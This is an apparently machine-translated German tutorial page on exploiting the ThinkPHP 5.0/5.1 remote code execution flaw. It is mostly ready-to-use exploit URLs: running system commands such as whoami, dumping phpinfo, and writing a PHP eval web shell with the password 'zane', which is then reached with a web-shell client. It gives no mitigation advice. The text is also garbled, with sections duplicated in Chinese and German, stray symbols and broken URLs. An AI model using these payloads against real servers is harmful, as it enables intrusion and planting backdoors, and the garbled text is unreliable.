Heim  >  Artikel  >  PHP-Framework  >  Über die Ausnutzung von ThinkPHP-Schwachstellen

Über die Ausnutzung von ThinkPHP-Schwachstellen

藏色散人
藏色散人nach vorne
2020-08-31 13:37:532989Durchsuche

Das Folgende ist eine Einführung in die Ausnutzung von ThinkPHP-Schwachstellen durch die Tutorial-Kolumne thinkphpFramework. Ich hoffe, dass es für Freunde in Not hilfreich sein wird!

Über die Ausnutzung von ThinkPHP-Schwachstellen

thinkphp_5x_command Ausführungsschwachstelle

Betroffene Versionen umfassen die Versionen 5.0 und 5.1

Docker-Schwachstellenumgebungs-Quellcode:
https://github.com/vulnspy/thinkphp-5.1 . 29<code>https://github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:
thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

利用system函数远程命令执行

EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

通过phpinfo函数写出phpinfo()信息

EXP:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1Einrichtung der lokalen Umgebung:

thinkphp5.0.15+php5.6n+ apache2.0

http://www.thinkphp.cn/donate/download/id/1125.html

Systemfunktion für Remote-Befehlsausführung verwenden


EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/ thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

phpinfo()-Informationen über die phpinfo-Funktion schreiben


EXP:

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1🎜 🎜Schreiben zum Schälen🎜
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php

或者

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>
🎜Verwenden Sie ein Küchenmesser zum Verbinden🎜`🎜http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php Das Passwort ist zane🎜🎜http://127.0.0.1/middleware/ thinkphp_5. 0.15_full/test.php Passwort ist zane🎜`🎜

Das obige ist der detaillierte Inhalt vonÜber die Ausnutzung von ThinkPHP-Schwachstellen. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Stellungnahme:
Dieser Artikel ist reproduziert unter:cnblogs.com. Bei Verstößen wenden Sie sich bitte an admin@php.cn löschen